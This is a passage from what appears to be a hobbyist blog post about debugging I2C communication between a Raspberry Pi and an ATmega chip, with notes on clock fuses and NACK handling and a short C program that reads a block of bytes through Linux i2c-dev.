Reading was another matter however. Most of the time i2cget on the Pi failed, and when it did work it only returned 0x65 no matter what the parameters. I’d already read extensively about the Raspberry Pi’s i2c clock stretching bug and applied various fixes, which didn’t seem to make any difference. What did the trick was to remove the clock divide on the atmega’s fuses – by default it runs at 8MHz but the fuse divides the instruction clock down to 1MHz – without the divide it could keep up with the Pi’s implementation and all reads were successful.

I still had to solve the ‘0x65 problem’, and went into the i2c code to try and figure out what was going on (using 8 LEDs to display the i2c status register). It seems that reading single bytes one at a time is done by issuing a TW_ST_DATA_NACK as opposed to TW_ST_DATA_ACK, as the master sends a not-acknowledge for the last byte it reads. This state is not supported by the library, so after fiddling around with it a bit I switched over on the Pi’s side to the python smbus library and tried read_i2c_block_data – which reads 32 bytes at a time. The first byte is still 0x65 (101 in decimal, in the photo above) but the rest are correct. I’ll need to read a bit more of the i2c protocol to figure that one out (and get the attiny working eventually), but at least it’s enough for what I need now.
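If you’d rather stay in C on the Pi side, the kernel’s i2c-dev interface can do much the same job – this sketch sets the slave address, writes a register offset and reads 32 bytes back, which is close to (though not exactly the same transaction as) read_i2c_block_data. The slave address 0x04 and the offset here are just placeholders:

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/i2c-dev.h>

int main(void) {
  int fd = open("/dev/i2c-1", O_RDWR);          /* i2c bus 1 on later Pis          */
  if (fd < 0) { perror("open"); return 1; }

  if (ioctl(fd, I2C_SLAVE, 0x04) < 0) {         /* 0x04: placeholder slave address */
    perror("ioctl");
    return 1;
  }

  unsigned char reg = 0x00;                     /* buffer offset to read from      */
  unsigned char buf[32];

  write(fd, &reg, 1);                           /* set the slave's internal address */
  int n = read(fd, buf, sizeof(buf));           /* then read a block back           */

  for (int i = 0; i < n; i++)
    printf("%02x ", buf[i]);
  printf("\n");

  close(fd);
  return 0;
}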

Handy collection of pinouts